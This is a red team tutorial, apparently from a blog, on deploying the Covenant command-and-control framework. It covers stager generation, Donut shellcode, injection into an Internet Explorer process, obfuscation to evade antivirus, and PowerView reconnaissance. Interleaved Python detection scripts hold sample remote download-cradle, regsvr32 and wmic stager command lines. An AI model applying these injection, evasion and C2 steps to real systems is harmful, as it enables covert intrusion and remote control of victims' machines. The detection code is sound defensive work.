
1/6/2021 A New PowerShell Empire - the Covenant C2 Tutorial

A NEW POWERSHELL EMPIRE – THE COVENANT C2 TUTORIAL
Posted by TEHG | Jan 14, 2020 | Redteam

For this Covenant C2 tutorial you will need an Active Directory environment (see how to create one quickly here). Covenant is the new command and control framework for red team and pentesting engagements. PowerShell Empire is dead, and honestly Covenant is already 10x the beast Empire could ever be.

https://ethicalhackingguru.com/a-new-powershell-empire-the-covenant-c2-tutorial/ 1/28

This Covenant C2 tutorial covers how to set up Covenant, and it will continue to evolve to document best practices for using it as the premier command and control framework.

See Some Other Posts:

Crack Hashes With Hashcat Without Money For A Dank PC Build Using Colabcat
How To Use Confuser Ex To Bypass Antivirus
How To Execute A .NET Assembly Inside A C# Program
How To Run Shellcode With Go
How To Inject Go ShellCode With C# Into Other Processes

Here are some reasons to use the Covenant C2 framework for red team engagements.

Dynamically compiles stagers.

Offensive security is moving away from PowerShell and relying on native compiling techniques; this is the core philosophy of Covenant.

Has its own Slack channel!

PowerShell Empire is no longer supported.

Table of Contents 
1. Here’s What You Need
2. Installation
3. Docker Installation
4. Adding Encryption
5. Listeners
6. Launchers
7. Getting a Grunt
8. Interacting with Grunts
9. Use Covenant for Priv Escalation
10. Grunt Taskings
11. How to Use Donut with Covenant
12. Use Donut 0.9.3
13. Alternatives To Compiling Donut
14. Inject A Covenant Stager PIC
15. How To Obfuscate Grunt Stagers
16. How To Import PowerShell Into Covenant
17. How To Use Covenant With Evil-WinRM

HERE’S WHAT YOU NEED

Kali Linux Virtual Machine – VirtualBox
Windows 10 64 Bit Virtual Machine – VirtualBox
Windows 2016 64 Bit Virtual Machine – VirtualBox
Windows Active Directory Accounts: 1 service account (an account with an SPN set), 1 local admin account, 1 domain admin account.

INSTALLATION
The first step to install Covenant is to download the dotnet-sdk.

I can't find the package! The Microsoft article gives a solution that works; use it as seen below.

This is the way I got it to work.

sudo dpkg --purge packages-microsoft-prod && sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install {the .NET Core package}

After that the package manager can locate and install the package:

sudo apt-get install dotnet-sdk-2.X   # minor version is cut off in the source; use the 2.x SDK the Covenant README lists

And if that does not work, as it may not in Kali 2020, then these are the steps.

sudo apt-get install -y gpg
wget -O- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg
sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/
wget https://packages.microsoft.com/config/debian/<version>/prod.list   # Debian release number is cut off in the source
sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list
sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg
sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list
sudo apt-get install -y apt-transport-https
sudo apt-get update
sudo apt-get install dotnet-sdk-2.X

Getting back to the installation for Covenant:

$ ~ > git clone --recurse-submodules https://github.com/cobbr/Covenant
$ ~ > cd Covenant/Covenant
$ ~/Covenant/Covenant > dotnet build
$ ~/Covenant/Covenant > dotnet run
Covenant/Covenant$ dotnet build && dotnet run

DOCKER INSTALLATION
If you are inclined to, you can install Covenant using the Docker image, although I don't find the normal installation very difficult.

Covenant/Covenant$ docker build -t covenant .

ADDING ENCRYPTION
Covenant connections are encrypted by default. Let me say that again: by default, network traffic from Covenant is encrypted.

A dedicated HTTPS listener/agent setup is used in the context of Covenant to blend into normal traffic and avoid raising suspicion.

Found a good tutorial for creating a self-signed SSL certificate. We want our command and control framework connections to be encrypted!

openssl req -newkey rsa:4096 \
  -x509 \
  -sha256 \
  -days 3650 \
  -nodes \
  -out example.crt \
  -keyout example.key

LISTENERS
Covenant listeners are the configured listening interfaces that grunts phone back home to once they are active.

The connectivity is extremely fast and reliable in my experience, and I did not run into any issues at all in that regard.

There is a trick to listeners: turn off the HTTPS and SSL cert verification settings, and make sure you set the listener's ConnectAddress to the IP address of the Kali Linux VM.

LAUNCHERS
In the Covenant architecture, launchers are used to create grunts. They launch attacks on the targets.

When creating a new launcher there are several options, which are explained in the GitHub page's documentation.

Here is one for example.

The ValidateCert option determines if the grunt will validate the listener's SSL certificate to prevent MiTM attacks. There are scenarios where target network proxies can interfere with certificate validation, and it's preferable to not validate the certificate. This option is only relevant when using the HTTP CommType, and will only be displayed if you have selected the HTTP CommType.
https://github.com/cobbr/Covenant/wiki/Launchers

Covenant's launchers are all of the hall-of-fame modern Windows exploits: MSBuild, PowerShell, InstallUtil, WMIC, Cscript, Regsvr32, etc. These are the whitelisted-application bypass tools we need to bypass hardened Windows security.
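The launcher binaries listed above are exactly what a defender watches for in process-creation telemetry, because each is a signed Windows tool whose only unusual feature is the arguments it was given. The following is an added example written for this page, not Covenant's own code or a vendor signature: it scores constructed process-creation records (Sysmon-style ParentImage / Image / CommandLine fields written as key=value pairs) for the binaries named in the tutorial combined with the hallmarks of a remotely fetched or encoded stager, such as the hosted PowerShell launcher used later in this post. The record layout, indicator patterns, allow-lists and sample lines are all assumptions constructed for illustration.

```python
"""Score process-creation records for the launcher binaries named in this
tutorial (MSBuild, PowerShell, InstallUtil, WMIC, Cscript, Regsvr32) when they
are run with the hallmarks of a remotely fetched or encoded stager.  Added
example for this write-up, not Covenant code or a vendor signature: the
'key=value|key=value' record layout, the indicator patterns and the sample
lines are all constructed for illustration.
"""
import re

LAUNCHER_BINARIES = {"msbuild.exe", "powershell.exe", "installutil.exe",
                     "wmic.exe", "cscript.exe", "regsvr32.exe"}

# An Office parent makes any of these launchers far more suspicious.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Indicators that apply to every launcher.
GENERIC_INDICATORS = [
    (re.compile(r"https?://", re.I), "remote URL on the command line"),
]

# Indicators tied to how each binary is abused as a stager launcher.
SPECIFIC_INDICATORS = {
    "powershell.exe": [
        (re.compile(r"-(enc|encodedcommand|e)\b", re.I), "encoded command"),
        (re.compile(r"DownloadString|DownloadData|Net\.WebClient|\biex\b|Invoke-Expression", re.I),
         "in-memory download cradle"),
    ],
    "regsvr32.exe": [(re.compile(r"scrobj\.dll|/i:", re.I), "COM scriptlet execution")],
    "wmic.exe": [(re.compile(r"/format:", re.I), "XSL stylesheet execution")],
    "installutil.exe": [(re.compile(r"/logfile=|/u\b", re.I), "uninstall/logfile bypass pattern")],
    "msbuild.exe": [(re.compile(r"\.xml\b", re.I), "stand-alone .xml project as build input")],
    "cscript.exe": [(re.compile(r"\\Users\\|\\Temp\\|\\ProgramData\\", re.I), "script in a user-writable path")],
}

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_LOG = [
    r"UtcTime=2020-01-14 18:02:11|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/launcher')",
    r"UtcTime=2020-01-14 18:05:40|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:http://10.0.0.5:8000/a.sct scrobj.dll",
    r"UtcTime=2020-01-14 18:07:02|ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1",
    r"UtcTime=2020-01-14 18:09:15|ParentImage=C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\Common7\IDE\devenv.exe|Image=C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\MSBuild.exe|CommandLine=MSBuild.exe MyApp.sln /t:Build",
    r"UtcTime=2020-01-14 18:11:48|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic os get /format:https://10.0.0.5:8000/a.xsl",
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Turn one 'key=value|key=value' record into a dict (constructed format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def score_event(ev):
    """Return a finding for a launcher binary with stager indicators, else None."""
    image = basename(ev.get("Image", ""))
    if image not in LAUNCHER_BINARIES:
        return None
    cmd = ev.get("CommandLine", "")
    indicators = GENERIC_INDICATORS + SPECIFIC_INDICATORS.get(image, [])
    reasons = [why for rx, why in indicators if rx.search(cmd)]
    if not reasons:
        return None  # plain administrative use of the tool
    parent = basename(ev.get("ParentImage", ""))
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    return {"time": ev.get("UtcTime"), "image": image, "parent": parent,
            "score": len(reasons), "reasons": reasons}


def triage(lines):
    """Findings for all records, highest score first (ties keep log order)."""
    findings = [f for f in (score_event(parse_event(l)) for l in lines) if f]
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["time"], f["image"], f["score"], "; ".join(f["reasons"]))
```

The benign records (a scheduled backup script run from explorer.exe, Visual Studio invoking MSBuild on a solution) produce no finding, while the three stager-style invocations are ranked with the Office-spawned one on top; in practice the indicator lists are where the tuning effort goes.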

Even that isn't enough now, though, and that is why obfuscation is still required.

Covenant, however, leaves obfuscation to the user. An example of using an obfuscated command through Covenant would be taking the output of generating a new launcher and running it through something like the Donut project.

GETTING A GRUNT
In order to get a grunt I copied the generated PowerShell launcher command and hosted it on a Python web server on my Kali VM.

I then opened a cmd terminal on the Windows 10 VM and ran the PowerShell string.

You will have to whitelist the stager in Windows Defender, because it will quarantine it immediately.

Once that is taken care of you should be able to get your first grunt.

INTERACTING WITH GRUNTS


Get the launcher command to run on the victim and get back a new grunt. Interacting with grunts is done through the individual grunt, which is now communicating back to the Covenant server.

Running commands is easy.

USE COVENANT FOR PRIV ESCALATION
A popular Windows privilege escalation and post-exploitation enumeration tool is named Seatbelt. In this example I have given a command to my new grunt.

Seatbelt's BasicOSInfo command runs and the output is shown in the terminal.

GRUNT TASKINGS
The Grunt Taskings tab shows the tasks that have been requested of grunts.

HOW TO USE DONUT WITH COVENANT
Donut is a tool you should know about; it's changed the game a bit. Basically, it produces position-independent shellcode for process injection. Then you can use another tool, such as Rastamouse's injector program, that takes Donut shellcode as input.

To build the newest Donut version:

Step 1.

Download Visual Studio 2019 and, under "get new tools and features", make sure you install the C++ command line tools. You need an x64 Native Tools Prompt to build Donut.

Step 2.

Get Donut. I have preferred to use Donut version 0.9.3, which is precompiled in the donut demos repository; get it here.

Step 3.

Open the x64 Native Tools Prompt, navigate to the donut-master folder and build.

USE DONUT 0.9.3

Step 1.

Start Covenant and, after setting up a listener, create a binary launcher: click the "Generate" button, then download it.

Here are the details for my Grunt if you need help. Make sure to target the 4.0 .NET framework.

Step 2.

Open a terminal and navigate to the donut-demos-master folder. Run donut on the GruntStager from Covenant. The -a 2 flag means the target build is x64; this is what you want.

Step 3.

Run the donut loader on the instance file. Voila! Sit back and look at the new Grunt.

donut.exe -f GruntStager.exe -a 2
loader.exe instance

This will create a new Grunt in the Covenant console, and from here I can escalate to a higher integrity process (more privilege, e.g. admin or root privileges).

ALTERNATIVES TO COMPILING
DONUT
Instead of compiling Donut and deciding which version to use, there is a convenient method for creating PIC called donut-maker.py.

INJECT A COVENANT STAGER PIC

In this Covenant C2 tutorial we covered how to use several tools to create PIC (process-injectable code, i.e. the position-independent shellcode described above) out of the Covenant Grunt Stager.

When you are ready to process-inject that shellcode, the next steps are really simple thanks to RastaMouse.

1. PIC your Grunt Stager through donut-maker.py.
2. Start a new Console Project in Visual Studio 2017 and name it "GruntInjection". Copy over the Injector Program.
3. Base64-encode your payload.bin (from Step 1), paste it into the new C# project and save.
4. Edit the code so the payload is a verbatim string literal, which is done with @"base64".
5. Build GruntInjection targeting an x64 CPU configuration (this is important!).
6. Spawn a new iexplore.exe process by starting a new Internet Explorer.
7. Run the binary on the target and give it the PID of the running IE process to spoof. We are spoofing a (long-term) process, not creating one out of thin air!

PS C:\Users\bob.bob> [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("payload.bin"))

Take the base64-encoded string and insert it in the GruntInjection program.

// Hardcoded Grunt Stager
public static byte[] gruntStager = Convert.FromBase64String(@"<base64 string from above>");

C:\Users\bob.bob\source\repos\GruntInjection\...\GruntInjection.exe "C:\Program Files\Internet Explorer\iexplore.exe" 2624

Now there should be a new Grunt in your Covenant console.
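From the detection side, the injection just described has a distinctive footprint: a process such as iexplore.exe, which never hosts .NET code, loads the Common Language Runtime shortly after another process opened a thread in it, because the Donut-wrapped stager is a .NET assembly that bootstraps the CLR wherever it lands. The following is an added example for this page, not RastaMouse's, Donut's or Covenant's code: it correlates hand-written Sysmon-style ImageLoad (event 7) and CreateRemoteThread (event 8) records and rates each unexpected CLR host. The record layout, the allow-list of expected CLR hosts and the sample records (including the injector path) are constructed assumptions; only the iexplore.exe target and PID 2624 are taken from the walkthrough above.

```python
"""Detect the CLR being loaded into a process that normally has no business
hosting .NET code, and raise the severity when that same process was first the
target of a remote thread.  Added example for this write-up, not Covenant or
Donut code: the records below are hand-written stand-ins for Sysmon event 7
(ImageLoad) and event 8 (CreateRemoteThread), and the allow-list is a constructed
starting point to be tuned per environment.
"""

# Images whose load means the .NET runtime is now executing inside the process.
CLR_IMAGES = {"clr.dll", "mscoree.dll", "mscoreei.dll", "clrjit.dll", "coreclr.dll"}

# Processes that are expected to host the CLR (constructed allow-list).
EXPECTED_CLR_HOSTS = {"powershell.exe", "powershell_ise.exe", "devenv.exe",
                      "msbuild.exe", "dotnet.exe", "w3wp.exe"}

# Constructed telemetry: (sequence, event_id, fields).  Sequence 1 is the
# injector from this tutorial opening a thread in the IE process it was given;
# sequence 2 is that IE process loading the CLR a moment later.
SAMPLE_EVENTS = [
    (1, 8, {"SourceImage": r"C:\Users\bob.bob\source\repos\GruntInjection\bin\x64\Release\GruntInjection.exe",
            "SourceProcessId": 4120,
            "TargetImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
            "TargetProcessId": 2624}),
    (2, 7, {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe", "ProcessId": 2624,
            "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"}),
    (3, 7, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ProcessId": 5100,
            "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"}),
    (4, 7, {"Image": r"C:\Windows\System32\notepad.exe", "ProcessId": 6002,
            "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoree.dll"}),
    (5, 7, {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe", "ProcessId": 2624,
            "ImageLoaded": r"C:\Windows\System32\urlmon.dll"}),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_clr_injection(events):
    """Return {pid: finding} for every process that loaded the CLR while not
    being an expected .NET host.  Severity is 'high' when a remote thread was
    created in that process earlier in the stream, 'medium' otherwise."""
    remote_thread_sources = {}  # target pid -> image that opened a thread in it
    findings = {}
    for _seq, event_id, f in sorted(events, key=lambda e: e[0]):
        if event_id == 8:
            remote_thread_sources[f["TargetProcessId"]] = basename(f["SourceImage"])
            continue
        if event_id != 7 or basename(f["ImageLoaded"]) not in CLR_IMAGES:
            continue
        host = basename(f["Image"])
        if host in EXPECTED_CLR_HOSTS:
            continue  # PowerShell, Visual Studio, IIS workers and so on
        pid = f["ProcessId"]
        if pid in remote_thread_sources:
            findings[pid] = {"image": host, "severity": "high",
                             "reason": f"CLR loaded after remote thread from {remote_thread_sources[pid]}"}
        else:
            findings.setdefault(pid, {"image": host, "severity": "medium",
                                      "reason": "CLR loaded into a host that does not normally run .NET"})
    return findings


if __name__ == "__main__":
    for pid, finding in detect_clr_injection(SAMPLE_EVENTS).items():
        print(pid, finding["severity"], finding["image"], "-", finding["reason"])
```

The ordering matters: the remote-thread event is recorded first so that the later CLR load in the same PID can be promoted to high severity, while a CLR load in notepad.exe with no preceding remote thread stays a medium-severity lead, and the PowerShell load is ignored by the allow-list.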

HOW TO OBFUSCATE GRUNT STAGERS

To obfuscate grunts you can run the C# program through obfuscate.py, which replaces keywords with less common ones to evade detection by AV.

python3 obfuscate.py gruntstager.cs

Where is gruntstager.cs? Under Launchers in Covenant there is a Code tab which contains the code for the stager.

From there get the file over to the Windows target and build it with Visual Studio 2017.

HOW TO IMPORT POWERSHELL INTO COVENANT

To import PowerShell privilege escalation and recon scripts into Covenant, go to the Interact tab on an active Grunt and type in "PowerShellImport".

This will open a file dialog where you choose which script to import.

Once the script is imported you can call its functions; this is an example using the PowerView.ps1 script.

powershell get-domainuser -identity <username>
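The PowerShell engine's script block logging is emitted by the engine itself, not by powershell.exe, so an imported PowerView script still leaves a record even when the engine is hosted inside another process. As an added example for this page (not Covenant or PowerView code), the following normalises constructed script block records (event 4104-style HostApplication and ScriptBlockText fields), undoes backtick splitting and odd casing, matches a small PowerView function list that includes the Get-DomainUser call shown above, and flags an unexpected host application. The function list, host allow-list and sample records are constructed assumptions.

```python
"""Match script block logging records against a small PowerView function list,
after undoing the cheap obfuscations, and flag PowerShell running inside an
unexpected host process.  Added example for this write-up, not Covenant or
PowerView code: the HostApplication / ScriptBlockText records are hand-written
stand-ins for Windows PowerShell event 4104, and both name lists are constructed.
"""
import re

# Subset of PowerView function names (constructed for the example; Get-DomainUser
# is the one this tutorial calls).  Compared after normalisation, so lower case.
POWERVIEW_FUNCTIONS = {
    "get-domainuser", "get-domaincomputer", "get-domaingroup", "get-domaingroupmember",
    "get-domainspnticket", "invoke-kerberoast", "find-localadminaccess",
    "get-domaintrust", "find-domainshare",
}

# Processes in which PowerShell is expected to run (constructed allow-list).
EXPECTED_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# Constructed 4104-style records (not real telemetry).
SAMPLE_SCRIPT_BLOCKS = [
    # Imported script running inside a grunt process rather than powershell.exe.
    {"HostApplication": r"C:\Users\bob.bob\AppData\Local\Temp\GruntStager.exe",
     "ScriptBlockText": "Get-DomainUser -Identity svc_sql -Properties samaccountname,serviceprincipalname"},
    # Same cmdlet with backtick splitting and odd casing in a normal host.
    {"HostApplication": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ScriptBlockText": "gET-d`omAinU`seR   -identity admin"},
    # Legitimate RSAT cmdlet: similar intent, different tool, must not match.
    {"HostApplication": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ScriptBlockText": "Get-ADUser -Filter * -SearchBase 'OU=Staff,DC=corp,DC=local'"},
    {"HostApplication": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ScriptBlockText": r"Get-ChildItem C:\Users\bob.bob\Documents"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize(script):
    """Strip backticks (PowerShell's escape character, which is legal inside a
    command name and so is used to split it), collapse whitespace, lower-case."""
    text = script.replace("`", "")
    text = re.sub(r"\s+", " ", text)
    return text.lower().strip()


def analyze_script_block(event):
    """Return a finding dict, or None when the record looks benign."""
    host = basename(event.get("HostApplication", ""))
    raw = event.get("ScriptBlockText", "")
    norm = normalize(raw)
    hits = sorted(name for name in POWERVIEW_FUNCTIONS
                  if re.search(r"\b" + re.escape(name) + r"\b", norm))
    reasons = []
    if hits:
        reasons.append("PowerView function(s): " + ", ".join(hits))
        if "`" in raw:
            reasons.append("backticks split the cmdlet name (obfuscation)")
    if host and host not in EXPECTED_HOSTS:
        reasons.append(f"PowerShell engine hosted by {host}")
    if not reasons:
        return None
    return {"host": host, "hits": hits, "reasons": reasons}


def scan(events):
    """All findings for a batch of script block records, in input order."""
    return [f for f in (analyze_script_block(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_SCRIPT_BLOCKS):
        print(finding["host"], finding["hits"], "; ".join(finding["reasons"]))
```

Note that the host check fires on its own, without a function-name hit: a 4104 record whose HostApplication is anything other than the expected PowerShell hosts is worth a look regardless of what the script does, and the Get-ADUser record shows why matching on the tool's own function names rather than on intent keeps the legitimate RSAT cmdlets quiet.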

HOW TO USE COVENANT WITH EVIL-WINRM

Curious what that Donut-Loader function in evil-winrm is?

I can use a convenient script named donut-maker.py to create a Donut payload. This file can then be used by evil-winrm's Donut-Loader function.

But first, to use Donut Maker I have to download the module using pip3 install donut-shellcode, or you will get a 'module not found' message.

Donut-Loader spawns a new process, which I specify below. It also takes the donut file I just created as an argument.

This command executes the donut payload and spawns a new grunt in Covenant.

© 2021 ethicalhackingguru.com